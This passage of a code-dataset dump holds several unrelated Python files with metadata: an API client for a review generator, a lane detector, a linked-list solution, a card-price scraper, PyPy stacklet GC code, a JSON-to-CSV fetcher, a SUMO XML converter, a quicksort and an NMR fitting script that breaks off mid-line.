link.ShowModal()","repo_name":"Brynify/uploader","sub_path":"LinkUI.py","file_name":"LinkUI.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} 
+{"seq_id":"36121125747","text":"#!/usr/bin/python\nimport requests\n\ndef get_reviews(dict):\n\tres = requests.get('http://gen-review.net/api/v1.0/get_reviews',json=dict)\n\tif res.ok:\n\t\treturn (res.json())\n\ndef progress(task_id):\n\tres = requests.get('http://80.249.144.13:5000/api/v1.0/progress/'+task_id)\n\tif res.ok:\n\t\treturn (res.json())\n\ndef post_id(dict):\n\tres = requests.post('http://80.249.144.13:5000/api/v1.0/gen', json=dict)\n\tif res.ok:\n\t\treturn (res.json())\t\n\ndef request_file_id(dict):\n\tres = requests.get('http://80.249.144.13:5000/api/v1.0/request_file_id', json=dict)\n\tif res.ok:\n\t\treturn (res.json())\t\n\n\ndef similar(dict):\n\tres = requests.get('http://80.249.144.13:5000/api/v1.0/similar_apps_count',json=dict)\n\tif res.ok:\n\t\treturn (res.json())\t\n\nif __name__ == \"__main__\":\n\tdict = {'user_id':'user2',\n\t\t\t'target_id': 'com.AndreyMelnikov.DroneRacingSimulator',\n\t\t\t'lang':'en_US',\n\t\t\t'reviews_amount': 200,\n\t\t\t'length': \"Short\",\n\t\t\t'file_id':'user2 123',\n\t\t\t'ratings':1,\n\t\t\t'similar_ids':['com.AndreyMelnikov.DRS','com.Freeride.Freerider']}\n\t#print(request_file_id({'user_id': 'user2'}))\n\tprint(post_id(dict))\n\t#print(get_reviews({'file_id':'user2 2020-02-27 22:53:44.456785', 'ratings':\"1\"}))\n\t#print(progress(\"f635e99d-7737-4498-b9ec-501316093de3\"))\n\t#print(similar({'target_id':'com.AndreyMelnikov.DroneRacingSimulator'}))","repo_name":"andrey-melnikov/gen_review","sub_path":"ClientEmulator.py","file_name":"ClientEmulator.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8935469431","text":"import matplotlib.pylab as plt\r\nimport cv2\r\nimport numpy as np\r\n\r\n# we have to mask the rest lines(lets make a function for that)\r\ndef region_of_interest(img, vertices):\r\n mask = np.zeros_like(img) # blank mask(matrix)\r\n #channel_count = img.shape[2] #number of color channels\r\n match_mask_color = 255 # create a match color with same channel count\r\n cv2.fillPoly(mask, vertices, match_mask_color) # fill polygons to mask all other lines\r\n masked_image = cv2.bitwise_and(img, mask) # to take only the matching pixels\r\n return masked_image\r\n\r\n# function to draw the line\r\ndef draw_lines(img, lines):\r\n img = np.copy(img)\r\n blank_image = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8) #blank img with same dimmension\r\n for line in lines:\r\n for x1, y1, x2, y2 in line: # loop through lines\r\n cv2.line(blank_image, (x1,y1), (x2,y2), (0, 255, 0),thickness=10) # draw line\r\n img = cv2.addWeighted(img, 0.8, blank_image, 1, 0.0)\r\n return img\r\n\r\nimage = cv2.imread('road.jpg') # read the image\r\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) #convert the image to rgb format\r\n\r\nprint(image.shape)\r\nheight = image.shape[0]\r\nwidth = image.shape[1]\r\n\r\n# Define Region of Tntereset\r\n# the lane we are in has 2 paralal line merging at one point (a triangle)\r\nregion_of_interest_vertices = [\r\n (0, height),\r\n (width/2, height/2),\r\n (width, height)\r\n]\r\n\r\n# we need to take the grayscale image\r\ngray_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\r\n# to detect the edge we will do canny edge detection\r\ncanny_image = cv2.Canny(gray_image, 100, 200)\r\n# do region of interest again in canny image\r\ncropped_image = region_of_interest(canny_image,\r\n np.array([region_of_interest_vertices], np.int32),)\r\n\r\n# to draw the line in these edges using hough 
lines\r\nlines = cv2.HoughLinesP(cropped_image,\r\n rho=6,\r\n theta=np.pi/180,\r\n threshold=160,\r\n lines=np.array([]),\r\n minLineLength=40,\r\n maxLineGap=25)\r\n\r\nimage_with_lines = draw_lines(image, lines)\r\n\r\nplt.imshow(image_with_lines)\r\nplt.show()","repo_name":"TridibD004/Road-Lane-Detection","sub_path":"detector_image2.py","file_name":"detector_image2.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22210891126","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def swapNodes(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n first = head\n fast = head\n for _ in range(k - 1):\n first = first.next\n fast = fast.next\n second = head\n while fast.next:\n fast = fast.next\n second = second.next\n first.val, second.val = second.val, first.val\n return head\n ","repo_name":"KrushnaSonwane/LeetCode-Solutions","sub_path":"1721-swapping-nodes-in-a-linked-list/1721-swapping-nodes-in-a-linked-list.py","file_name":"1721-swapping-nodes-in-a-linked-list.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"1734858514","text":"# Import the necessary libraries\nimport requests # library for making HTTP requests\nimport json # library for working with JSON data\nimport re # library for working with regular expressions\nfrom datetime import datetime # library for working with dates and times\nimport csv # library for working with CSV files\nimport os # library for working with the operating system\nimport pandas as pd # library for data manipulation and analysis\n\n# Prompt the user to choose between \"sealed\", \"sets\", or \"prints\"\nchoice = input(\"Enter your choice (sealed/sets/prints): \")\n\ndef csv_write(card,date,file):\n \"\"\"\n Write card data to a CSV file\n \"\"\"\n # Check if the file exists and is empty\n prewrite = False\n try:\n if os.stat(\"%s.csv\"%file).st_size == 0:\n prewrite=True\n except OSError:\n prewrite=True\n \n # If the file is empty or does not exist, add the headers to the CSV file\n if(prewrite):\n with open(\"%s.csv\"%file,\"a\") as f:\n writer = csv.writer(f)\n writer.writerow([\"name\", \"date\", \"rarity\", \"avg_price\", \"foil\", \"market\", \"market_foil\"])\n\n # Extract relevant data from the card dictionary\n name = card[\"name\"]\n avg_price = card[\"latest_price\"][\"avg\"]\n foil = card[\"latest_price\"][\"foil\"]\n market = card[\"latest_price\"][\"market\"]\n market_foil = card[\"latest_price\"][\"market_foil\"]\n rarity = card[\"rarity\"]\n row = [name, date, rarity, \"$%s\"%avg_price, \"$%s\"%foil, \"$%s\"%market, \"$%s\"%market_foil]\n\n # Write the row to the CSV file\n with open(\"%s.csv\"%file,\"a\") as f:\n writer = csv.writer(f)\n writer.writerow(row)\n\n\n# Define the API endpoint URL based on the user's choice\nif choice == \"sealed\":\n url = \"https://api.mtgstocks.com/sealed\"\nelif choice == \"sets\":\n url = \"https://api.mtgstocks.com/card_sets\"\nelif choice == \"prints\":\n url = \"https://api.mtgstocks.com/prints\"\nelse:\n print(\"Invalid choice.\")\n exit()\n\n# Prompt the user to enter a new number\nnumber = input(\"Enter a number: \")\n\n# Add the number to the URL\nurl += f\"/{number}\"\n\n# Define the headers for the request\nheaders = {\n 
\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\"\n}\n\n# Make an HTTP GET request to the endpoint with the headers\nresponse = requests.get(url, headers=headers)\n\n# Check if the request was successful (status code 200 indicates success)\nif response.status_code == 200:\n\n # Retrieve the data from the response as a JSON object\n data = response.json()\n\n # Create a new dictionary with only the desired key-value pairs\n if choice == \"sealed\":\n new_data = {\n \"Name\": data[\"name\"],\n \"Latest Prices\": data[\"latestPrice\"]\n }\n elif choice == \"sets\":\n new_data = {\n \"Name\": data[\"name\"],\n #\"In The Set\": data[\"prints\"]\n }\n # Iterate over each card in the \"prints\" section of the JSON data and write its information to a CSV file\n for card in data[\"prints\"]:\n # Call the csv_write function to write the card's information to the CSV file\n # Also pass the date and slug information to the function\n csv_write(card, datetime.utcfromtimestamp(data[\"date\"]/1000).strftime('%Y-%m-%d'), data[\"slug\"])\n\n # Read the CSV file for the specified slug using pandas and store the data in a DataFrame object\n df = pd.read_csv(f\"{data['slug']}.csv\")\n\n # Write the DataFrame object to an Excel file with the same slug name\n writer = pd.ExcelWriter(f\"{data['slug']}.xlsx\")\n df.to_excel(writer, index=False)\n writer._save()\n\n# If the user selected \"prints\" as the choice\n elif choice == \"prints\":\n # Convert the Unix timestamp for the latest price to a human-readable date and time format\n data[\"latest_price\"][\"date\"] = datetime.utcfromtimestamp(data[\"latest_price\"][\"date\"]/1000).strftime('%Y-%m-%d %H:%M:%S')\n # Create a new dictionary containing the name and latest price information for the card\n new_data = {\n \"Name\": data[\"name\"],\n \"Prices\": data[\"latest_price\"]\n }\n # Convert the new dictionary to a JSON string with an indent of 2\n json_string = json.dumps(new_data, indent=2)\n # Remove the curly braces from the string using regex\n json_string = re.sub(r\"[{}]\", \"\", json_string)\n # Print the modified JSON string to the console\n print(json_string)\n\n# If the request was not successful, print the HTTP status code\nelse:\n print(f\"Error: {response.status_code}\")\n\n\n","repo_name":"KDenston61/MTGStocks-Scraper","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27592416267","text":"from rpython.rlib.debug import ll_assert\nfrom rpython.rlib import rgc\nfrom rpython.rlib.objectmodel import specialize\nfrom rpython.rtyper.lltypesystem import lltype, llmemory, rffi\nfrom rpython.rtyper.lltypesystem.lloperation import llop\nfrom rpython.rtyper.annlowlevel import llhelper, MixLevelHelperAnnotator\nfrom rpython.annotator import model as annmodel\nfrom rpython.rtyper.llannotation import lltype_to_annotation\nfrom rpython.rlib import _rffi_stacklet as _c\n\n\n_asmstackrootwalker = None # BIG HACK: monkey-patched by asmgcroot.py\n_stackletrootwalker = None\n\ndef get_stackletrootwalker():\n # XXX this is too complicated now; we don't need a StackletRootWalker\n # instance to store global state. We could rewrite it all in one big\n # function. 
We don't care enough for now.\n\n # lazily called, to make the following imports lazy\n global _stackletrootwalker\n if _stackletrootwalker is not None:\n return _stackletrootwalker\n\n from rpython.memory.gctransform.asmgcroot import (\n WALKFRAME, CALLEE_SAVED_REGS, INDEX_OF_EBP, sizeofaddr)\n\n assert _asmstackrootwalker is not None, \"should have been monkey-patched\"\n basewalker = _asmstackrootwalker\n\n class StackletRootWalker(object):\n _alloc_flavor_ = \"raw\"\n\n def setup(self, obj):\n # initialization: read the SUSPSTACK object\n p = llmemory.cast_adr_to_ptr(obj, lltype.Ptr(SUSPSTACK))\n if not p.handle:\n return False\n self.context = llmemory.cast_ptr_to_adr(p.handle)\n self.next_callback_piece = p.callback_pieces\n anchor = p.anchor\n del p\n self.curframe = lltype.malloc(WALKFRAME, flavor='raw')\n self.otherframe = lltype.malloc(WALKFRAME, flavor='raw')\n self.fill_initial_frame(self.curframe, anchor)\n return True\n\n def fill_initial_frame(self, curframe, initialframedata):\n # Copy&paste :-(\n initialframedata += 2*sizeofaddr\n reg = 0\n while reg < CALLEE_SAVED_REGS:\n curframe.regs_stored_at[reg] = initialframedata+reg*sizeofaddr\n reg += 1\n retaddraddr = initialframedata + CALLEE_SAVED_REGS * sizeofaddr\n retaddraddr = self.translateptr(retaddraddr)\n curframe.frame_address = retaddraddr.address[0]\n\n def fetch_next_stack_piece(self):\n if self.next_callback_piece == llmemory.NULL:\n lltype.free(self.curframe, flavor='raw')\n lltype.free(self.otherframe, flavor='raw')\n self.context = llmemory.NULL\n return False\n else:\n anchor = self.next_callback_piece\n nextaddr = anchor + sizeofaddr\n nextaddr = self.translateptr(nextaddr)\n self.next_callback_piece = nextaddr.address[0]\n self.fill_initial_frame(self.curframe, anchor)\n return True\n\n @specialize.arg(3)\n def customtrace(self, gc, obj, callback, arg):\n #\n # Pointers to the stack can be \"translated\" or not:\n #\n # * Non-translated pointers point to where the data would be\n # if the stack was installed and running.\n #\n # * Translated pointers correspond to where the data\n # is now really in memory.\n #\n # Note that 'curframe' contains non-translated pointers, and\n # of course the stack itself is full of non-translated pointers.\n #\n if not self.setup(obj):\n return\n\n while True:\n callee = self.curframe\n retaddraddr = self.translateptr(callee.frame_address)\n retaddr = retaddraddr.address[0]\n ebp_in_caller = callee.regs_stored_at[INDEX_OF_EBP]\n ebp_in_caller = self.translateptr(ebp_in_caller)\n ebp_in_caller = ebp_in_caller.address[0]\n basewalker.locate_caller_based_on_retaddr(retaddr,\n ebp_in_caller)\n\n # see asmgcroot for similarity:\n while True:\n location = basewalker._shape_decompressor.next()\n if location == 0:\n break\n addr = basewalker.getlocation(callee, ebp_in_caller,\n location)\n # yield the translated addr of the next GCREF in the stack\n addr = self.translateptr(addr)\n gc._trace_callback(callback, arg, addr)\n\n caller = self.otherframe\n reg = CALLEE_SAVED_REGS - 1\n while reg >= 0:\n location = basewalker._shape_decompressor.next()\n addr = basewalker.getlocation(callee, ebp_in_caller,\n location)\n caller.regs_stored_at[reg] = addr # non-translated\n reg -= 1\n\n location = basewalker._shape_decompressor.next()\n caller.frame_address = basewalker.getlocation(callee,\n ebp_in_caller,\n location)\n # ^^^ non-translated\n if caller.frame_address == llmemory.NULL:\n # completely done with this piece of stack\n if not self.fetch_next_stack_piece():\n return\n continue\n #\n 
self.otherframe = callee\n self.curframe = caller\n # loop back\n\n def translateptr(self, addr):\n return _c._translate_pointer(self.context, addr)\n\n _stackletrootwalker = StackletRootWalker()\n return _stackletrootwalker\nget_stackletrootwalker._annspecialcase_ = 'specialize:memo'\n\ndef complete_destrptr(gctransformer):\n translator = gctransformer.translator\n mixlevelannotator = MixLevelHelperAnnotator(translator.rtyper)\n args_s = [lltype_to_annotation(lltype.Ptr(SUSPSTACK))]\n s_result = annmodel.s_None\n destrptr = mixlevelannotator.delayedfunction(suspstack_destructor,\n args_s, s_result)\n mixlevelannotator.finish()\n lltype.attachRuntimeTypeInfo(SUSPSTACK, destrptr=destrptr)\n\n\ndef customtrace(gc, obj, callback, arg):\n stackletrootwalker = get_stackletrootwalker()\n stackletrootwalker.customtrace(gc, obj, callback, arg)\nlambda_customtrace = lambda: customtrace\n\ndef suspstack_destructor(suspstack):\n h = suspstack.handle\n if h:\n _c.destroy(h)\n\n\nSUSPSTACK = lltype.GcStruct('SuspStack',\n ('handle', _c.handle),\n ('anchor', llmemory.Address),\n ('callback_pieces', llmemory.Address),\n rtti=True)\nNULL_SUSPSTACK = lltype.nullptr(SUSPSTACK)\n\nASM_FRAMEDATA_HEAD_PTR = lltype.Ptr(lltype.ForwardReference())\nASM_FRAMEDATA_HEAD_PTR.TO.become(lltype.Struct('ASM_FRAMEDATA_HEAD',\n ('prev', ASM_FRAMEDATA_HEAD_PTR),\n ('next', ASM_FRAMEDATA_HEAD_PTR)\n ))\nalternateanchor = lltype.malloc(ASM_FRAMEDATA_HEAD_PTR.TO,\n immortal=True)\nalternateanchor.prev = alternateanchor\nalternateanchor.next = alternateanchor\n\nFUNCNOARG_P = lltype.Ptr(lltype.FuncType([], _c.handle))\npypy_asm_stackwalk2 = rffi.llexternal('pypy_asm_stackwalk',\n [FUNCNOARG_P,\n ASM_FRAMEDATA_HEAD_PTR],\n lltype.Signed, sandboxsafe=True,\n _nowrapper=True)\n\n\ndef _new_callback():\n # Here, we just closed the stack. Get the stack anchor, store\n # it in the gcrootfinder.suspstack.anchor, and create a new\n # stacklet with stacklet_new(). If this call fails, then we\n # are just returning NULL.\n _stack_just_closed()\n #\n return _c.new(gcrootfinder.newthrd, llhelper(_c.run_fn, _new_runfn),\n llmemory.NULL)\n\ndef _stack_just_closed():\n # Immediately unlink the new stackanchor from the doubly-linked\n # chained list. When returning from pypy_asm_stackwalk2, the\n # assembler code will try to unlink it again, which should be\n # a no-op given that the doubly-linked list is empty.\n stackanchor = llmemory.cast_ptr_to_adr(alternateanchor.next)\n gcrootfinder.suspstack.anchor = stackanchor\n alternateanchor.prev = alternateanchor\n alternateanchor.next = alternateanchor\n\ndef _new_runfn(h, _):\n # Here, we are in a fresh new stacklet.\n llop.gc_stack_bottom(lltype.Void) # marker for trackgcroot.py\n #\n # There is a fresh suspstack object waiting on the gcrootfinder,\n # so populate it with data that represents the parent suspended\n # stacklet and detach the suspstack object from gcrootfinder.\n suspstack = gcrootfinder.attach_handle_on_suspstack(h)\n #\n # Call the main function provided by the (RPython) user.\n suspstack = gcrootfinder.runfn(suspstack, gcrootfinder.arg)\n #\n # Here, suspstack points to the target stacklet to which we want\n # to jump to next. Read the 'handle' and forget about the\n # suspstack object.\n return _consume_suspstack(suspstack)\n\ndef _consume_suspstack(suspstack):\n h = suspstack.handle\n ll_assert(bool(h), \"_consume_suspstack: null handle\")\n suspstack.handle = _c.null_handle\n return h\n\ndef _switch_callback():\n # Here, we just closed the stack. 
Get the stack anchor, store\n # it in the gcrootfinder.suspstack.anchor, and switch to this\n # suspstack with stacklet_switch(). If this call fails, then we\n # are just returning NULL.\n oldanchor = gcrootfinder.suspstack.anchor\n _stack_just_closed()\n h = _consume_suspstack(gcrootfinder.suspstack)\n #\n # gcrootfinder.suspstack.anchor is left with the anchor of the\n # previous place (i.e. before the call to switch()).\n h2 = _c.switch(h)\n #\n if not h2: # MemoryError: restore\n gcrootfinder.suspstack.anchor = oldanchor\n gcrootfinder.suspstack.handle = h\n return h2\n\n\nclass StackletGcRootFinder(object):\n suspstack = NULL_SUSPSTACK\n\n def new(self, thrd, callback, arg):\n self.newthrd = thrd._thrd\n self.runfn = callback\n self.arg = arg\n # make a fresh new clean SUSPSTACK\n rgc.register_custom_trace_hook(SUSPSTACK, lambda_customtrace)\n newsuspstack = lltype.malloc(SUSPSTACK)\n newsuspstack.handle = _c.null_handle\n self.suspstack = newsuspstack\n # Invoke '_new_callback' by closing the stack\n #\n callback_pieces = llop.gc_detach_callback_pieces(llmemory.Address)\n newsuspstack.callback_pieces = callback_pieces\n #\n h = pypy_asm_stackwalk2(llhelper(FUNCNOARG_P, _new_callback),\n alternateanchor)\n h = rffi.cast(_c.handle, h)\n #\n llop.gc_reattach_callback_pieces(lltype.Void, callback_pieces)\n return self.get_result_suspstack(h)\n\n def switch(self, suspstack):\n # Immediately before the switch, 'suspstack' describes the suspended\n # state of the *target* of the switch. Then it is theoretically\n # freed. In fact what occurs is that we reuse the same 'suspstack'\n # object in the target, just after the switch, to store the\n # description of where we came from. Then that \"other\" 'suspstack'\n # object is returned.\n self.suspstack = suspstack\n #\n callback_pieces = llop.gc_detach_callback_pieces(llmemory.Address)\n old_callback_pieces = suspstack.callback_pieces\n suspstack.callback_pieces = callback_pieces\n #\n h = pypy_asm_stackwalk2(llhelper(FUNCNOARG_P, _switch_callback),\n alternateanchor)\n h = rffi.cast(_c.handle, h)\n #\n llop.gc_reattach_callback_pieces(lltype.Void, callback_pieces)\n if not h:\n self.suspstack.callback_pieces = old_callback_pieces\n #\n return self.get_result_suspstack(h)\n\n def attach_handle_on_suspstack(self, handle):\n s = self.suspstack\n self.suspstack = NULL_SUSPSTACK\n ll_assert(bool(s.anchor), \"s.anchor should not be null\")\n s.handle = handle\n llop.gc_writebarrier(lltype.Void, llmemory.cast_ptr_to_adr(s))\n return s\n\n def get_result_suspstack(self, h):\n #\n # Return from a new() or a switch(): 'h' is a handle, possibly\n # an empty one, that says from where we switched to.\n if not h:\n raise MemoryError\n elif _c.is_empty_handle(h):\n return NULL_SUSPSTACK\n else:\n # This is a return that gave us a real handle. 
Store it.\n return self.attach_handle_on_suspstack(h)\n\n def is_empty_handle(self, suspstack):\n return not suspstack\n\n def get_null_handle(self):\n return NULL_SUSPSTACK\n\n\ngcrootfinder = StackletGcRootFinder()\n","repo_name":"mesalock-linux/mesapy","sub_path":"rpython/rlib/_stacklet_asmgcc.py","file_name":"_stacklet_asmgcc.py","file_ext":"py","file_size_in_byte":13217,"program_lang":"python","lang":"en","doc_type":"code","stars":371,"dataset":"github-code","pt":"83"} +{"seq_id":"37952916379","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\nimport csv\nimport datetime\nimport os\n\ntry:\n URL = 'https://jsonbox.io/box_9da5210c1a35783aa3a7'\n\n try:\n response = requests.get(URL)\n json = response.json()\n except:\n raise Exception(\"Não foi possível obter os dados\")\n \n FILE_FOLDER = 'temp/'\n \n if os.path.isdir(FILE_FOLDER) == False:\n os.mkdir(FILE_FOLDER)\n \n file_name = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n \n file_path = FILE_FOLDER + file_name + '.csv'\n\n try:\n with open(file_path, 'w') as outf:\n dw = csv.DictWriter(outf, json[0].keys())\n dw.writeheader()\n for row in json:\n dw.writerow(row)\n except :\n raise Exception(\"Não foi possível criar o arquivo\")\n\n print('Arquivo criado')\nexcept Exception as exception:\n print(exception)","repo_name":"rbalves/json-to-csv","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24988337486","text":"from xml.dom import minidom\n\n\n# Assumed to contain only edges where trucks are allowed (can be done with netcovert).\n# 2019-09-09-12-00-50/osm.net.xml\ndatapath = \"/home/idlab126/Sumo/Antwerp/\"\nmydoc = minidom.parse(datapath+\"osm_Antwerp.net.xml\") # The original net file obtained with the sumo wizzard\nprint(\"XML parsed\")\nroot = mydoc.documentElement\n\nnewdoc = minidom.Document()\n# root of the new xml file\nnewroot = newdoc.createElement('net')\n\n# set containing the nodes that are used by the network (excluding isolated nodes that is)\nused_nodes = set()\nparallel_edges = set() # parallel edges can occur and we want to deal with them\n\nxml_nodes = set()\nxml_edges = set()\n\n\n\nprint(\"Edges...\")\nedges = mydoc.getElementsByTagName('edge')\nfor item in edges:\n # ignore internal edges\n if not 'function' in item.attributes:\n iid = item.attributes['id'].value\n ffrom = item.attributes['from'].value\n tto = item.attributes['to'].value\n ttype = item.attributes['type'].value\n\n lanes = [child for child in item.childNodes if child.nodeType==minidom.Node.ELEMENT_NODE and child.tagName=='lane']\n length = str(float(lanes[0].attributes['length'].value)+10.0) # edges in the xml file are consistently smaller than when viewed in netedit\n speed = lanes[0].attributes['speed'].value\n nlanes = str(len(lanes))\n\n if (ffrom,tto) in parallel_edges:\n split_node = newdoc.createElement('node')\n split_node.setAttribute(\"id\", f\"split_{iid}\")\n split_node.setAttribute(\"type\", \"parallel_split\")\n xml_nodes.add(split_node)\n\n extra_edge = newdoc.createElement('edge')\n extra_edge.setAttribute(\"id\", iid+\"s\")\n extra_edge.setAttribute(\"from\", ffrom)\n extra_edge.setAttribute(\"to\", split_node.attributes['id'].value)\n extra_edge.setAttribute(\"type\", ttype)\n extra_edge.setAttribute(\"length\", str(0.1)) \n extra_edge.setAttribute(\"speed\", speed)\n extra_edge.setAttribute(\"lanes\", nlanes)\n\n xml_edges.add(extra_edge)\n ffrom = 
split_node.attributes['id'].value\n\n\n edge = newdoc.createElement('edge')\n edge.setAttribute(\"id\", iid)\n edge.setAttribute(\"from\", ffrom)\n edge.setAttribute(\"to\", tto)\n edge.setAttribute(\"type\", ttype)\n edge.setAttribute(\"length\", length) \n edge.setAttribute(\"speed\", speed)\n edge.setAttribute(\"lanes\", nlanes)\n\n used_nodes.add(ffrom)\n used_nodes.add(tto)\n\n parallel_edges.add((ffrom, tto))\n xml_edges.add(edge)\n\n \n\nprint(\"Junctions...\")\nnodes = mydoc.getElementsByTagName('junction')\nfor item in nodes:\n if item.attributes['id'].value in used_nodes:\n node = newdoc.createElement('node')\n node.setAttribute(\"id\", item.attributes['id'].value)\n node.setAttribute(\"type\", item.attributes['type'].value)\n xml_nodes.add(node)\n\n\n# first write the nodes, then the edges\nfor n in xml_nodes:\n newroot.appendChild(n)\nfor e in xml_edges:\n newroot.appendChild(e)\n\n\n\n\nnewfile = open(datapath+\"Java_osm.net.xml\", \"w\")\nnewfile.write(newroot.toprettyxml())\n","repo_name":"UGent-DNA/TGS","sub_path":"Code/ConfigurationCode/ConvertNetXml.py","file_name":"ConvertNetXml.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41032409553","text":"from random import randint\nimport time\nstart_time = time.time()\n\n# array = [5, 7, 9, 0, 3, 1, 6, 2, 4, 8]\n\narray = []\nfor _ in range(10000):\n array.append(randint(1, 100))\n# print(array)\ndef quick_sort(array):\n if len(array) <= 1:\n return array\n pivot = array[0]\n tail = array[1:]\n\n left_side = [x for x in tail if x <= pivot]\n right_side = [x for x in tail if x > pivot]\n # print((left_side + [pivot] + right_side))\n return quick_sort(left_side) + [pivot] + quick_sort(right_side)\n\nprint(quick_sort(array))\nprint(\"time : \", time.time() - start_time)\n","repo_name":"beer-2000/problem-solve","sub_path":"ThisIsCodingTest/4_Sorting/퀵정렬_파이썬.py","file_name":"퀵정렬_파이썬.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"30567647726","text":"from numpy.lib.function_base import delete, diff\nimport pandas as pd\n\nimport ast\nimport pprint\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy.stats import gamma\n\n###################################################################################\n#TEMPORARY\n\n#Passing the content of the .csv file to a Pandas DataFrame\ndf = pd.read_csv(r'D:\\Dropbox (Personal)\\Purdue University\\2020_C (Fall Term)\\PHYS590 (NMR)\\Python Programs\\NMR-Nematic-Scaling\\NMR_measurements\\Raw Recovery Data x=0.05898 11.7T.csv')\n\n#Importing the content of the Magnetization_recovery_dict dictionary to a text file\nfile = open(\"NMR-Nematic-Scaling\\Output_Files\\Text_files\\Magnetization_recovery_pairs_dictionary.txt\", \"r\")\ncontents = file.read()\nMagnetization_recovery_dict = ast.literal_eval(contents)\nfile.close()\n#Print statements\n#pprint.pprint(Magnetization_recovery_dict)\n\n###################################################################################\n\n#Data for testing\n\n#for temperature_value in Magnetization_recovery_dict.keys():\ntemperature_value=25.0\n\nx = np.array(df[Magnetization_recovery_dict[temperature_value][0]])\nx = x[np.logical_not(np.isnan(x))]\ny = np.array(df[Magnetization_recovery_dict[temperature_value][1]])\ny = y[np.logical_not(np.isnan(y))]\n\n#Making sure that all time recovery values are in ascenting order\narr1inds = 
x.argsort()\nx = x[arr1inds[::1]]\ny = y[arr1inds[::1]]\n\ny_norm = ( y - min(y) ) / ( max(y) - min(y) )\n\n###################################################################################\n\n#preparing the grid\nnumber_of_rows = 10000\nDistMax = 0.5\ndeltaDist = DistMax / number_of_rows\nnumber_of_columns = 100000\nW1max=200\ndeltaW1 = W1max / number_of_columns\n\nt_inflection = 1E-3\nInflection_magnetization_exp = 0.55\nxpeak = 0.172722420529815795438\nW1peak = xpeak / t_inflection\n\nslope_at_inflection = .22\n\n# grid initialization: rows and columns\ngrid_distribution = np.zeros(shape=(number_of_rows, number_of_columns))\n\n#Calculation of the squared residue between y data values and prediction\ndef Squared_Residue(z, w):\n return np.linalg.norm(z-w)**2\n\n#the center of each column is equidistant from its next\nW1_fit_points = np.array([ deltaW1/2 + deltaW1 * n for n in range(0,number_of_columns)])\n\n#find the column that the W1peak point belongs to\npeak_column_number = int(np.floor_divide(W1peak, deltaW1)+1)\n\ndef recovery_function(x):\n return (1 - (9/10)*np.exp(-6*x) - (1/10)*np.exp(-x) )\n\n#Squared_Residue(y_norm, recovery_function(x))\n\n###################################################################################\n#distribution\ndef normalization_check(z,dz):\n return np.sum(z)*dz\n\n#triangular distribution\n# initial_dist_shape_dict={\"1\":[2/(W1max*W1peak), 0],\"-1\":[-2/((W1max-W1peak)*W1max), 2/(W1max-W1peak)]}\n# pprint.pprint(initial_dist_shape_dict)\n\n# W1_distribution = np.array( [ initial_dist_shape_dict[\"1\"][0]*W1_fit_points[k]\n# +initial_dist_shape_dict[\"1\"][1]\n# for k in range(0, peak_column_number)]\n# + [ initial_dist_shape_dict[\"-1\"][0]*W1_fit_points[k]\n# +initial_dist_shape_dict[\"-1\"][1]\n# for k in range(peak_column_number, number_of_columns)] )\n\nbeta = 5\nalpha = (W1peak + beta)/beta - 30\nW1_distribution = gamma.pdf(W1_fit_points, a = alpha, scale = beta)\n\ndeltaDist = max(W1_distribution)*1.05/number_of_rows\n\n# W1_distribution[2000] = W1_distribution[2000]*1.00001\n\nW1_distribution_discrete = []\nfor i in range(0,len(W1_distribution)):\n W1_distribution_discrete.append(int(np.rint(W1_distribution[i]/deltaDist)))\n\nW1_distribution_discrete = np.array(W1_distribution_discrete)\n\n###################################################################################\n\ndef log_dev_recovery_function(x):\n return ( (27/5)*x*np.exp(-6*x) + (1/10)*x*np.exp(-x) )\n\ndef second_log_dev_recovery_function(x):\n return ( (27/5)*x*np.exp(-6*x) + (1/10)*x*np.exp(-x) - (162/5)*(x**2)*np.exp(-6*x) - (1/10)*(x**2)*np.exp(-x))\n\n#Inflection Magnetization (0.20736543348999795)\n# np.dot(log_dev_recovery_function(t_inflection*W1_fit_points),W1_distribution)*deltaW1\n\ndef inflection_slope(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1):\n return np.dot(log_dev_recovery_function(t_inflection*W1_fit_points),W1_distribution_discrete*deltaDist)*deltaW1\n \nprint(inflection_slope(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1)/0.20736543348999795)\n\n#Inflection Magnetization (0.13902848935038245)\n# np.dot(second_log_dev_recovery_function(t_inflection*W1_fit_points),W1_distribution)*deltaW1\ndef inflection_slope_difference(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1):\n return 